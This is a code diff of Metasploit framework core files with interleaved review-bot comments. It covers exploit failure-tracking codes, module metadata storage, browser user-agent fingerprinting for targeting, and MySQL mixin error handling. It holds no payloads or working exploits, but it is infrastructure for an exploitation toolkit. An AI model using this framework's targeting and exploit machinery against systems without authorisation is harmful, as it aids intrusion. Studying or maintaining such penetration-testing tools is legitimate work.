+ md.add_ref(vals[:name])
+ when :mixin
+ # md.add_mixin(vals[:name])
+ end
+ end
+
+ md.ready = true
+ md.save
+ md.id
+
+ }
+ end
+
+ def remove_module_details(mtype, refname)
+ return if not self.migrated
+ ::ActiveRecord::Base.connection_pool.with_connection {
+ md = Mdm::ModuleDetail.find(:conditions => [ 'mtype = ? and refname = ?', mtype, refname])
+ md.destroy if md
+ }
+ end
+
+ def module_to_details_hash(m)
+ res = {}
+ bits = []
+
+ res[:mtime] = ::File.mtime(m.file_path) rescue Time.now
+ res[:file] = m.file_path
+ res[:mtype] = m.type
+ res[:name] = m.name.to_s
+ res[:refname] = m.refname
+ res[:fullname] = m.fullname
+ res[:rank] = m.rank.to_i
+ res[:license] = m.license.to_s
+
+ res[:description] = m.description.to_s.strip
+
+ m.arch.map{ |x|
+ bits << [ :arch, { :name => x.to_s } ]
+ }
+
+ m.platform.platforms.map{ |x|
+ bits << [ :platform, { :name => x.to_s.split('::').last.downcase } ]
+ }
+
+ m.author.map{|x|
+ bits << [ :author, { :name => x.to_s } ]
+ }
+
+ m.references.map do |r|
+ bits << [ :ref, { :name => [r.ctx_id.to_s, r.ctx_val.to_s].join("-") } ]
+ end
+
+ res[:privileged] = m.privileged?
+
+
+ if m.disclosure_date
+ begin
+ res[:disclosure_date] = m.disclosure_date.to_datetime.to_time
+ rescue ::Exception
+ res.delete(:disclosure_date)
+ end
+ end
+
+ if(m.type == "exploit")
+
+ m.targets.each_index do |i|
+ bits << [ :target, { :index => i, :name => m.targets[i].name.to_s } ]
+ end
+
+ if (m.default_target)
+ res[:default_target] = m.default_target
+ end
+
+ # Some modules are a combination, which means they are actually aggressive
+ res[:stance] = m.stance.to_s.index("aggressive") ? "aggressive" : "passive"
+
+
+ m.class.mixins.each do |x|
+ bits << [ :mixin, { :name => x.to_s } ]
+ end
+ end
+
+ if(m.type == "auxiliary")
+
+ m.actions.each_index do |i|
+ bits << [ :action, { :name => m.actions[i].name.to_s } ]
+ end
+
+ if (m.default_action)
+ res[:default_action] = m.default_action.to_s
+ end
+
+ res[:stance] = m.passive? ? "passive" : "aggressive"
+ end
+
+ res[:bits] = bits
+
+ res
+ end
+
end
end
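Review bot: `remove_module_details` calls `Mdm::ModuleDetail.find(:conditions => [...])` with no `:first` or `:all` selector. With only an options hash, ActiveRecord treats this as a lookup by id and should raise RecordNotFound rather than return the row, so the following `md.destroy if md` is never reached. Other finders in this commit use `find(:first, ...)`; here `md = Mdm::ModuleDetail.where(:mtype => mtype, :refname => refname).first` would do. In `update_all_module_details`, `stime` is assigned and unused, and `skipped.include?([mt[0], mn])` is a linear scan per module, which a Hash or Set keyed on the pair would avoid.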
diff --git a/lib/msf/core/encoded_payload.rb b/lib/msf/core/encoded_payload.rb
index a85244faef..413d1e521f 100755
--- a/lib/msf/core/encoded_payload.rb
+++ b/lib/msf/core/encoded_payload.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# $Id$
require 'msf/core'
diff --git a/lib/msf/core/encoder.rb b/lib/msf/core/encoder.rb
index e9d10d2b75..b1b17cab23 100644
--- a/lib/msf/core/encoder.rb
+++ b/lib/msf/core/encoder.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/encoder/alphanum.rb b/lib/msf/core/encoder/alphanum.rb
index 734f64ee6c..4f34450e1c 100644
--- a/lib/msf/core/encoder/alphanum.rb
+++ b/lib/msf/core/encoder/alphanum.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/encoder/nonalpha.rb b/lib/msf/core/encoder/nonalpha.rb
index 5cad9cd2e2..c0f6492aa6 100644
--- a/lib/msf/core/encoder/nonalpha.rb
+++ b/lib/msf/core/encoder/nonalpha.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/encoder/nonupper.rb b/lib/msf/core/encoder/nonupper.rb
index 8fac308d49..2084c01c70 100644
--- a/lib/msf/core/encoder/nonupper.rb
+++ b/lib/msf/core/encoder/nonupper.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/encoder/xor.rb b/lib/msf/core/encoder/xor.rb
index 4595c429a4..69b6db7d30 100644
--- a/lib/msf/core/encoder/xor.rb
+++ b/lib/msf/core/encoder/xor.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/encoder/xor_additive_feedback.rb b/lib/msf/core/encoder/xor_additive_feedback.rb
index 734239fdef..2f3e2cecb3 100644
--- a/lib/msf/core/encoder/xor_additive_feedback.rb
+++ b/lib/msf/core/encoder/xor_additive_feedback.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/encoding/xor.rb b/lib/msf/core/encoding/xor.rb
index bbb64cb9eb..e8b3a97e40 100644
--- a/lib/msf/core/encoding/xor.rb
+++ b/lib/msf/core/encoding/xor.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Encoding
diff --git a/lib/msf/core/event_dispatcher.rb b/lib/msf/core/event_dispatcher.rb
index 6f96456bda..a7f3929632 100644
--- a/lib/msf/core/event_dispatcher.rb
+++ b/lib/msf/core/event_dispatcher.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/exceptions.rb b/lib/msf/core/exceptions.rb
index 5cdb6583e2..a0a3b496a4 100644
--- a/lib/msf/core/exceptions.rb
+++ b/lib/msf/core/exceptions.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/exceptions.rb.ut.rb b/lib/msf/core/exceptions.rb.ut.rb
index a2921b46b0..f10326a339 100644
--- a/lib/msf/core/exceptions.rb.ut.rb
+++ b/lib/msf/core/exceptions.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb
index 39409c2b95..20ab759c7e 100644
--- a/lib/msf/core/exploit.rb
+++ b/lib/msf/core/exploit.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/module'
@@ -28,6 +29,20 @@ end
###
class Exploit < Msf::Module
+
+ ##
+ # Exceptions
+ ##
+
+ # Indicate that the exploit should abort because it has completed
+ class Complete < RuntimeError
+ end
+
+ # Indicate that the exploit should abort because it has failed
+ class Failed < RuntimeError
+ end
+
+
##
#
# Default compatibility settings for exploit modules.
@@ -55,33 +70,108 @@ class Exploit < Msf::Module
#
# Can't tell if the target is exploitable or not.
#
- Unknown = [-1, "Cannot reliably check exploitability."]
+ Unknown = [ 'unknown', "Cannot reliably check exploitability."]
#
# The target is safe and is therefore not exploitable.
#
- Safe = [ 0, "The target is not exploitable." ]
+ Safe = [ 'safe', "The target is not exploitable." ]
#
# The target is running the service in question but may not be
# exploitable.
#
- Detected = [ 1, "The target service is running, but could not be validated." ]
+ Detected = [ 'detected', "The target service is running, but could not be validated." ]
#
# The target appears to be vulnerable.
#
- Appears = [ 2, "The target appears to be vulnerable." ]
+ Appears = [ 'appears', "The target appears to be vulnerable." ]
#
# The target is vulnerable.
#
- Vulnerable = [ 3, "The target is vulnerable." ]
+ Vulnerable = [ 'vulnerable', "The target is vulnerable." ]
#
# The exploit does not support the check method.
#
- Unsupported = [ 4, "This exploit does not support check." ]
+ Unsupported = [ 'unsupported', "This exploit does not support check." ]
+ end
+
+
+
+ ##
+ #
+ # Constants indicating the reason for an unsuccessful exploit attempt
+ #
+ ##
+ module Failure
+
+ #
+ # No confidence in success or failure
+ #
+ None = 'none'
+
+ #
+ # No confidence in success or failure
+ #
+ Unknown = 'unknown'
+
+ #
+ # The network service was unreachable (connection refused, etc)
+ #
+ Unreachable = 'unreachable'
+
+ #
+ # The exploit settings were incorrect
+ #
+ BadConfig = 'bad-config'
+
+ #
+ # The network service disconnected us mid-attempt
+ #
+ Disconnected = 'disconnected'
+
+ #
+ # The application endpoint or specific service was not found
+ #
+ NotFound = 'not-found'
+
+ #
+ # The application replied in an unexpected fashion
+ #
+ UnexpectedReply = 'unexpected-reply'
+
+ #
+ # The exploit triggered some form of timeout
+ #
+ TimeoutExpired = 'timeout-expired'
+
+ #
+ # The exploit was interrupted by the user
+ #
+ UserInterrupt = 'user-interrupt'
+
+ #
+ # The application replied indication we do not have access
+ #
+ NoAccess = 'no-access'
+
+ #
+ # The target is not compatible with this exploit or settings
+ #
+ NoTarget = 'no-target'
+
+ #
+ # The application response indicated it was not vulnerable
+ #
+ NotVulnerable = 'not-vulnerable'
+
+ #
+ # The payload was delivered but no session was opened (AV, network, etc)
+ #
+ PayloadFailed = 'payload-failed'
end
#
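Review bot: In the new `Failure` module the comment on `None` is a copy of the one on `Unknown` ("No confidence in success or failure"), so the two constants read as synonyms. Elsewhere in this commit `None` is the value the constructor assigns to `fail_reason`, so its comment would be better as `# No failure has been recorded (initial value)`. The `NoAccess` comment has a typo: `replied indication` should be `replied indicating`. Separately, the first element of each `CheckCode` pair changes from an integer to a string in this hunk; any caller that compares or orders the old numeric codes would need updating, which cannot be confirmed from here.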
@@ -281,8 +371,10 @@ class Exploit < Msf::Module
[ Target ], 'Targets')
self.default_target = info['DefaultTarget']
self.payload_info = info['Payload'] || {}
+ self.successful = false
self.session_count = 0
self.active_timeout = 120
+ self.fail_reason = Failure::None
if (info['Payload'] and info['Payload']['ActiveTimeout'])
self.active_timeout = info['Payload']['ActiveTimeout'].to_i
@@ -1080,7 +1172,7 @@ class Exploit < Msf::Module
end
#
- # Generate random alphan lower characters avoiding the exploit's bad
+ # Generate random alpha lower characters avoiding the exploit's bad
# characters.
#
def rand_text_alpha_lower(length, bad=payload_badchars)
@@ -1176,6 +1268,7 @@ class Exploit < Msf::Module
#
def on_new_session(session)
self.session_count += 1
+ self.successful = true
end
#
@@ -1193,6 +1286,46 @@ class Exploit < Msf::Module
self.session_count = 0
end
+
+ ##
+ # Failure tracking
+ ##
+
+ def fail_with(reason,msg=nil)
+ self.fail_reason = reason
+ self.fail_detail = msg
+ raise Msf::Exploit::Failed, (msg || "No reason given")
+ end
+
+ def report_failure
+
+ return unless framework.db and framework.db.active
+
+ info = {
+ :timestamp => Time.now.utc,
+ :workspace => framework.db.find_workspace(self.workspace),
+ :module => self.fullname,
+ :fail_reason => self.fail_reason,
+ :fail_detail => self.fail_detail,
+ :target_name => self.target.name,
+ :username => self.owner,
+ :refs => self.references
+ }
+
+ if self.datastore['RHOST'] and self.options['RHOST']
+ info[:host] = self.datastore['RHOST']
+ end
+
+ if self.datastore['RPORT'] and self.options['RPORT']
+ info[:port] = self.datastore['RPORT']
+ if self.class.ancestors.include?(Msf::Exploit::Remote::Tcp)
+ info[:proto] = 'tcp'
+ end
+ end
+
+ framework.db.report_exploit_failure(info)
+ end
+
##
#
# Aliases
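Review bot: `report_failure` dereferences `self.target.name` unconditionally, so if no target is selected (assuming `target` can return nil) the reporting path itself raises NoMethodError while another failure is being handled. A guard such as `:target_name => (self.target ? self.target.name : nil),` keeps the failure record intact. Both new methods also lack doc comments; for `fail_with` I would add `# Records reason and detail, then raises Msf::Exploit::Failed; reason should be a Failure constant`.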
@@ -1215,6 +1348,16 @@ class Exploit < Msf::Module
#
##
+ #
+ # The reason why the exploit was not successful (one of Msf::Exploit::FailReason)
+ #
+ attr_accessor :fail_reason
+
+ #
+ # Detailed exception string indicating why the exploit was not successful
+ #
+ attr_accessor :fail_detail
+
#
# The list of targets.
#
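Review bot: The comment on `fail_reason` refers to `Msf::Exploit::FailReason`, but the module added in this commit is named `Failure`. Change it to `# The reason why the exploit was not successful (one of Msf::Exploit::Failure)` so readers can find the constants.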
@@ -1242,6 +1385,12 @@ class Exploit < Msf::Module
#
attr_reader :session_count
+ #
+ # The boolean indicating whether the exploit succeeded
+ #
+ attr_reader :successful
+
+
protected
#
@@ -1257,14 +1406,20 @@ protected
#
attr_writer :payload_info
#
- # Number of sessions created by this exploit instance.
+ # Number of sessions created by this exploit instance.
#
attr_writer :session_count
#
- # Maximum number of seconds for active handlers
+ # Maximum number of seconds for active handlers
#
attr_accessor :active_timeout
+ #
+ # Boolean indicating whether the exploit succeeded
+ #
+ attr_writer :successful
+
+
#
# Overrides the base class method and serves to initialize default
# compatibilities for exploits
diff --git a/lib/msf/core/exploit.rb.ut.rb b/lib/msf/core/exploit.rb.ut.rb
index 23fec69b54..494c091ce9 100644
--- a/lib/msf/core/exploit.rb.ut.rb
+++ b/lib/msf/core/exploit.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/msf/core/exploit/afp.rb b/lib/msf/core/exploit/afp.rb
index f2a855601e..a94d40f3d7 100644
--- a/lib/msf/core/exploit/afp.rb
+++ b/lib/msf/core/exploit/afp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/exploit/tcp'
diff --git a/lib/msf/core/exploit/arkeia.rb b/lib/msf/core/exploit/arkeia.rb
index d8178bac81..649732ebf5 100644
--- a/lib/msf/core/exploit/arkeia.rb
+++ b/lib/msf/core/exploit/arkeia.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/exploit/browser_autopwn.rb b/lib/msf/core/exploit/browser_autopwn.rb
index 745df12eeb..a792abcc1e 100644
--- a/lib/msf/core/exploit/browser_autopwn.rb
+++ b/lib/msf/core/exploit/browser_autopwn.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/brute.rb b/lib/msf/core/exploit/brute.rb
index 80a3235eaa..c57528118f 100644
--- a/lib/msf/core/exploit/brute.rb
+++ b/lib/msf/core/exploit/brute.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/brutetargets.rb b/lib/msf/core/exploit/brutetargets.rb
index ef1c0a4b9a..659d473921 100644
--- a/lib/msf/core/exploit/brutetargets.rb
+++ b/lib/msf/core/exploit/brutetargets.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/capture.rb b/lib/msf/core/exploit/capture.rb
index 43e5687126..dc12ddcb92 100644
--- a/lib/msf/core/exploit/capture.rb
+++ b/lib/msf/core/exploit/capture.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb
index 65967cd4dc..5e2e551a54 100644
--- a/lib/msf/core/exploit/cmdstager.rb
+++ b/lib/msf/core/exploit/cmdstager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/cmdstager_debug_asm.rb b/lib/msf/core/exploit/cmdstager_debug_asm.rb
index 9732dd9add..979edb6bec 100644
--- a/lib/msf/core/exploit/cmdstager_debug_asm.rb
+++ b/lib/msf/core/exploit/cmdstager_debug_asm.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/cmdstager_debug_write.rb b/lib/msf/core/exploit/cmdstager_debug_write.rb
index f25ca3628e..707369d2f7 100644
--- a/lib/msf/core/exploit/cmdstager_debug_write.rb
+++ b/lib/msf/core/exploit/cmdstager_debug_write.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/cmdstager_tftp.rb b/lib/msf/core/exploit/cmdstager_tftp.rb
index 032767f6a0..3b11683878 100644
--- a/lib/msf/core/exploit/cmdstager_tftp.rb
+++ b/lib/msf/core/exploit/cmdstager_tftp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/cmdstager_vbs.rb b/lib/msf/core/exploit/cmdstager_vbs.rb
index 879bc214dc..0f75595916 100644
--- a/lib/msf/core/exploit/cmdstager_vbs.rb
+++ b/lib/msf/core/exploit/cmdstager_vbs.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/cmdstager_vbs_adodb.rb b/lib/msf/core/exploit/cmdstager_vbs_adodb.rb
index cbfa931745..b723abbc4a 100644
--- a/lib/msf/core/exploit/cmdstager_vbs_adodb.rb
+++ b/lib/msf/core/exploit/cmdstager_vbs_adodb.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id: $
##
diff --git a/lib/msf/core/exploit/db2.rb b/lib/msf/core/exploit/db2.rb
index 3cc16fa3f6..c94ef17060 100644
--- a/lib/msf/core/exploit/db2.rb
+++ b/lib/msf/core/exploit/db2.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/exploit/dcerpc.rb b/lib/msf/core/exploit/dcerpc.rb
index 5ab2e6f762..51b11c738b 100644
--- a/lib/msf/core/exploit/dcerpc.rb
+++ b/lib/msf/core/exploit/dcerpc.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/dcerpc'
require 'rex/encoder/ndr'
require 'msf/core/exploit/dcerpc_epm'
diff --git a/lib/msf/core/exploit/dcerpc.rb.ut.rb b/lib/msf/core/exploit/dcerpc.rb.ut.rb
index 44123630e1..89b43df26e 100644
--- a/lib/msf/core/exploit/dcerpc.rb.ut.rb
+++ b/lib/msf/core/exploit/dcerpc.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', '..'))
diff --git a/lib/msf/core/exploit/dcerpc_epm.rb b/lib/msf/core/exploit/dcerpc_epm.rb
index e505ae75d8..da6e233460 100644
--- a/lib/msf/core/exploit/dcerpc_epm.rb
+++ b/lib/msf/core/exploit/dcerpc_epm.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/dcerpc_lsa.rb b/lib/msf/core/exploit/dcerpc_lsa.rb
index 67d251f43e..568f7aca6e 100644
--- a/lib/msf/core/exploit/dcerpc_lsa.rb
+++ b/lib/msf/core/exploit/dcerpc_lsa.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/dcerpc_mgmt.rb b/lib/msf/core/exploit/dcerpc_mgmt.rb
index 664c68cc2d..139c43f78a 100644
--- a/lib/msf/core/exploit/dcerpc_mgmt.rb
+++ b/lib/msf/core/exploit/dcerpc_mgmt.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/dect_coa.rb b/lib/msf/core/exploit/dect_coa.rb
index aa58712f1c..c7fe22ba1b 100644
--- a/lib/msf/core/exploit/dect_coa.rb
+++ b/lib/msf/core/exploit/dect_coa.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/dhcp.rb b/lib/msf/core/exploit/dhcp.rb
index a74c0cbe66..655e70877f 100644
--- a/lib/msf/core/exploit/dhcp.rb
+++ b/lib/msf/core/exploit/dhcp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/dialup.rb b/lib/msf/core/exploit/dialup.rb
index 530b351153..3ccd6732ce 100644
--- a/lib/msf/core/exploit/dialup.rb
+++ b/lib/msf/core/exploit/dialup.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Exploit::Remote::Dialup
diff --git a/lib/msf/core/exploit/egghunter.rb b/lib/msf/core/exploit/egghunter.rb
index 702dfce174..31db349cc1 100644
--- a/lib/msf/core/exploit/egghunter.rb
+++ b/lib/msf/core/exploit/egghunter.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# $Id$
require 'rex/exploitation/egghunter'
diff --git a/lib/msf/core/exploit/exe.rb b/lib/msf/core/exploit/exe.rb
index 4f68679b51..e4d632d0ef 100644
--- a/lib/msf/core/exploit/exe.rb
+++ b/lib/msf/core/exploit/exe.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/fileformat.rb b/lib/msf/core/exploit/fileformat.rb
index fa03829eff..a21b09ec05 100644
--- a/lib/msf/core/exploit/fileformat.rb
+++ b/lib/msf/core/exploit/fileformat.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
###
#
# This module exposes a simple method to create a file.
diff --git a/lib/msf/core/exploit/fmtstr.rb b/lib/msf/core/exploit/fmtstr.rb
index d2185ce6c0..7de70ff6e9 100644
--- a/lib/msf/core/exploit/fmtstr.rb
+++ b/lib/msf/core/exploit/fmtstr.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/ftp.rb b/lib/msf/core/exploit/ftp.rb
index a674c8466d..83bd5a7d9f 100644
--- a/lib/msf/core/exploit/ftp.rb
+++ b/lib/msf/core/exploit/ftp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
require 'msf/core/exploit/tcp'
diff --git a/lib/msf/core/exploit/ftpserver.rb b/lib/msf/core/exploit/ftpserver.rb
index 127f8388bc..48517b3862 100644
--- a/lib/msf/core/exploit/ftpserver.rb
+++ b/lib/msf/core/exploit/ftpserver.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
require 'msf/core/exploit/tcp'
diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb
index 82c29adf66..7fee95da7c 100644
--- a/lib/msf/core/exploit/http/client.rb
+++ b/lib/msf/core/exploit/http/client.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'uri'
require 'digest'
require 'rex/proto/ntlm/crypt'
@@ -127,7 +128,7 @@ module Exploit::Remote::HttpClient
opts[:pattern].each do |re|
if not re.match(info)
err = "The target server fingerprint \"#{info}\" does not match \"#{re.to_s}\", use 'set FingerprintCheck false' to disable this check."
- raise RuntimeError, err
+ fail_with(Msf::Exploit::Failure::NotFound, err)
end
end
end
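Review bot: `fail_with` is defined on `Msf::Exploit` in this commit, so this call raises NoMethodError instead of reporting the fingerprint mismatch if the HttpClient mixin is ever included by a module that is not an Exploit subclass (whether that happens is not visible here). A guard such as `respond_to?(:fail_with) ? fail_with(Msf::Exploit::Failure::NotFound, err) : raise(RuntimeError, err)` would keep the old behaviour in that case. `Failure::NoTarget`, documented as "not compatible with this exploit or settings", also reads as a closer match for a fingerprint mismatch than `NotFound`. The enclosing method starts outside the hunk.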
diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb
index 3e28631ebb..ce362225d7 100644
--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/service_manager'
require 'rex/exploitation/obfuscatejs'
require 'rex/exploitation/encryptjs'
@@ -225,7 +226,7 @@ module Exploit::Remote::HttpServer
when /opera\/(\d+(:?\.\d+)*)/
fp[:ua_name] = HttpClients::OPERA
fp[:ua_ver] = $1
- when /mozilla\/[0-9]\.[0-9] \(compatible; msie ([0-9]\.[0-9]+)/
+ when /mozilla\/[0-9]+\.[0-9] \(compatible; msie ([0-9]+\.[0-9]+)/
fp[:ua_name] = HttpClients::IE
fp[:ua_ver] = $1
else
@@ -266,6 +267,8 @@ module Exploit::Remote::HttpServer
fp[:os_flavor] = 'Vista'
when /windows nt 6.1/
fp[:os_flavor] = '7'
+ when /windows nt 6.2/
+ fp[:os_flavor] = '8'
when /gentoo/
fp[:os_flavor] = 'Gentoo'
when /debian/
diff --git a/lib/msf/core/exploit/imap.rb b/lib/msf/core/exploit/imap.rb
index 57fedf8118..8c9cc68bbb 100644
--- a/lib/msf/core/exploit/imap.rb
+++ b/lib/msf/core/exploit/imap.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
require 'msf/core/exploit/tcp'
diff --git a/lib/msf/core/exploit/ip.rb b/lib/msf/core/exploit/ip.rb
index ed33d61c63..4a5f7dc271 100644
--- a/lib/msf/core/exploit/ip.rb
+++ b/lib/msf/core/exploit/ip.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/ipv6.rb b/lib/msf/core/exploit/ipv6.rb
index e8c0a16a16..7be24e6aec 100644
--- a/lib/msf/core/exploit/ipv6.rb
+++ b/lib/msf/core/exploit/ipv6.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/java.rb b/lib/msf/core/exploit/java.rb
index 710de678a7..057ea00f2a 100644
--- a/lib/msf/core/exploit/java.rb
+++ b/lib/msf/core/exploit/java.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
###
#
# This mixn provides methods for interacting with a JDK installation to perform
diff --git a/lib/msf/core/exploit/kernel_mode.rb b/lib/msf/core/exploit/kernel_mode.rb
index 10af56f10e..3a0d65fd5e 100644
--- a/lib/msf/core/exploit/kernel_mode.rb
+++ b/lib/msf/core/exploit/kernel_mode.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
require 'rex/payloads/win32/kernel'
diff --git a/lib/msf/core/exploit/lorcon.rb b/lib/msf/core/exploit/lorcon.rb
index a01b98e574..fef50a759a 100644
--- a/lib/msf/core/exploit/lorcon.rb
+++ b/lib/msf/core/exploit/lorcon.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/lorcon2.rb b/lib/msf/core/exploit/lorcon2.rb
index e3a17cda82..3abaef55a3 100644
--- a/lib/msf/core/exploit/lorcon2.rb
+++ b/lib/msf/core/exploit/lorcon2.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb
index 0bfcc1096c..a982e53717 100644
--- a/lib/msf/core/exploit/mixins.rb
+++ b/lib/msf/core/exploit/mixins.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# $Id$
#
# All exploit mixins should be added to the list below
diff --git a/lib/msf/core/exploit/mssql.rb b/lib/msf/core/exploit/mssql.rb
index 4532b85040..e3cb309789 100644
--- a/lib/msf/core/exploit/mssql.rb
+++ b/lib/msf/core/exploit/mssql.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/exploit/mssql_commands'
require 'rex/proto/ntlm/crypt'
diff --git a/lib/msf/core/exploit/mssql_commands.rb b/lib/msf/core/exploit/mssql_commands.rb
index 5168376558..a735b5b4a8 100644
--- a/lib/msf/core/exploit/mssql_commands.rb
+++ b/lib/msf/core/exploit/mssql_commands.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/mssql_sqli.rb b/lib/msf/core/exploit/mssql_sqli.rb
index 26b1376926..57adcb4517 100644
--- a/lib/msf/core/exploit/mssql_sqli.rb
+++ b/lib/msf/core/exploit/mssql_sqli.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/exploit/mssql_commands'
diff --git a/lib/msf/core/exploit/mysql.rb b/lib/msf/core/exploit/mysql.rb
index 186a2bbf20..5de66d3698 100644
--- a/lib/msf/core/exploit/mysql.rb
+++ b/lib/msf/core/exploit/mysql.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
@@ -57,16 +58,25 @@ module Exploit::Remote::MYSQL
end
def mysql_login_datastore
- mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
+ begin
+ res = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
+ rescue Rex::ConnectionTimeout => e
+ print_error("Timeout: #{e.message}")
+ res = nil
+ end
+
+ return res
end
def mysql_query(sql)
- res = nil
begin
res = @mysql_handle.query(sql)
rescue ::RbMysql::Error => e
print_error("MySQL Error: #{e.class} #{e.to_s}")
- return
+ return nil
+ rescue Rex::ConnectionTimeout => e
+ print_error("Timeout: #{e.message}")
+ return nil
end
res
end
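Review bot: `mysql_login_datastore` now returns nil on a timeout instead of raising, yet `mysql_query` still calls `@mysql_handle.query(sql)` without checking the handle. If a caller ignores the nil login result and the handle was never set (how `mysql_login` assigns it is outside this hunk), the result is a NoMethodError that neither rescue clause catches. Adding `return nil unless @mysql_handle` at the top of `mysql_query` closes that gap. The `begin` / `res = nil` / `return res` sequence in `mysql_login_datastore` could also be a method-level `rescue` that returns nil.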
@@ -106,7 +116,7 @@ module Exploit::Remote::MYSQL
def mysql_get_variable(var)
res = mysql_query("SELECT #{var}")
- if res.respond_to? :first
+ if res and res.respond_to? :first
return res.first.first
end
end
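Review bot: The added `res and` is a no-op, because `nil.respond_to?(:first)` is already false. The case that remains unguarded is an empty result, where `res.first` is nil and the second `.first` raises. `return res.first.first if res.respond_to?(:first) and res.first` covers both. Since `var` is interpolated directly into the SELECT, a comment stating that it must be a fixed name supplied by the module, never external input, would be useful here.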
@@ -136,8 +146,12 @@ module Exploit::Remote::MYSQL
end
